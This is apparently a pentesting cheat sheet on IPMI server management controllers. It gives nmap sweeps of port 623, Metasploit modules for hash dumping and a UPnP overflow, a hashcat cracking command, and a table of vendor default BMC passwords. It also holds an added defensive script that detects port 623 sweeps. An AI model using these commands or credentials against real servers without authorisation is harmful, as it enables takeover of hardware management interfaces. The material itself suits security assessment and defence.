The IPMI protocol, introduced by Intel in 1998, is now supported by over 200 system vendors, including Cisco, Dell, HP, Supermicro, and more.
Systems utilizing IPMI version 2.0 can be managed via serial over LAN, allowing sysadmins to view serial console output in-band.
IPMI Uses
- Before the OS has booted to modify BIOS settings
- When the host is fully powered down
- Access to a host after a system failure
IPMI Functions
- Baseboard Management Controller (BMC) – A micro-controller and the essential component of IPMI
- Intelligent Chassis Management Bus (ICMB) – An interface that permits communication from one chassis to another
- Intelligent Platform Management Bus (IPMB) – Extends the BMC
- IPMI Memory – stores things such as the system event log, repository store data, and more
- Communications Interfaces – local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus
IPMI Components
Many Baseboard Management Controllers (BMCs), including popular options like HP Integrated Lights-Out (iLO), Dell Remote Access Controller (DRAC), and Supermicro Intelligent Platform Management Interface (IPMI), provide a web-based management console that allows administrators to remotely manage and monitor servers.
These BMCs not only offer an intuitive web interface but also support command-line remote access protocols such as Telnet or SSH for more advanced management tasks.
Additionally, they make use of port 623 UDP for the IPMI network protocol to facilitate seamless and secure communication between the management console and server hardware.
This combination of web-based and command-line tools provides IT professionals with the flexibility and control needed to maintain server health, perform updates, and troubleshoot issues efficiently.
IPMI Enumeration
nmap -n -p 623 10.10.0.0/24
nmap -n -sU -p 623 10.10.0.0/24
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > use exploit/multi/upnp/libupnp_ssdp_overflow
hashcat -m 7300 HASH_admin.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
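
A defender's view of the port 623 sweeps above, as an added example that is not part of the original page: the script flags sources outside a management allow-list that contact port 623 on several hosts. The log format, addresses, allow-list and threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed flow-log lines (not from the original page). The key=value
# layout is an assumed export format; adapt LINE_RE to your firewall.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=10.10.0.50 dst=10.10.0.11 proto=tcp dport=623
2024-05-01T10:00:01Z src=10.10.0.50 dst=10.10.0.12 proto=tcp dport=623
2024-05-01T10:00:02Z src=10.10.0.50 dst=10.10.0.11 proto=udp dport=623
2024-05-01T10:00:02Z src=10.10.0.50 dst=10.10.0.13 proto=udp dport=623
2024-05-01T10:00:03Z src=10.10.0.50 dst=10.10.0.14 proto=udp dport=623
2024-05-01T10:01:10Z src=10.10.0.5 dst=10.10.0.11 proto=udp dport=623
2024-05-01T10:01:11Z src=10.10.0.5 dst=10.10.0.12 proto=udp dport=623
2024-05-01T10:01:12Z src=10.10.0.5 dst=10.10.0.13 proto=udp dport=623
2024-05-01T10:02:00Z src=10.10.0.77 dst=10.10.0.11 proto=tcp dport=623
2024-05-01T10:02:05Z src=10.10.0.50 dst=10.10.0.20 proto=tcp dport=443
truncated line without fields
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"proto=(?P<proto>tcp|udp) dport=(?P<dport>\d+)$"
)
IPMI_PORT = 623                    # TCP and UDP both count, as in the nmap lines
ALLOWED_SOURCES = {"10.10.0.5"}    # hypothetical management jump host
SWEEP_THRESHOLD = 3                # distinct BMCs contacted before alerting


def find_ipmi_sweeps(log_text, allowed=ALLOWED_SOURCES, threshold=SWEEP_THRESHOLD):
    """Map each non-allow-listed source to the hosts it contacted on port 623,
    keeping only sources that reached at least `threshold` distinct hosts."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None or int(m["dport"]) != IPMI_PORT:
            continue  # malformed line or unrelated port
        if m["src"] in allowed:
            continue  # expected management traffic
        targets[m["src"]].add(m["dst"])
    return {s: sorted(d) for s, d in targets.items() if len(d) >= threshold}


if __name__ == "__main__":
    for src, dsts in find_ipmi_sweeps(SAMPLE_LOG).items():
        print(f"ALERT {src} contacted port {IPMI_PORT} on {len(dsts)} hosts: {dsts}")
```

Lowering the threshold to 1 turns this into a report of every non-allow-listed host that reached a BMC on port 623 at all.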
Brute Force
Only HP randomizes the password during the manufacturing process.
| Product Name | Default Username | Default Password |
| --- | --- | --- |
| HP Integrated Lights Out (iLO) | Administrator | <factory randomized 8-character string> |
| Dell Remote Access Card (iDRAC, DRAC) | root | calvin |
| IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero) |
| Fujitsu Integrated Remote Management Controller | admin | admin |
| Supermicro IPMI (2.0) | ADMIN | ADMIN |
| Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme |
| ASUS iKVM BMC | admin | admin |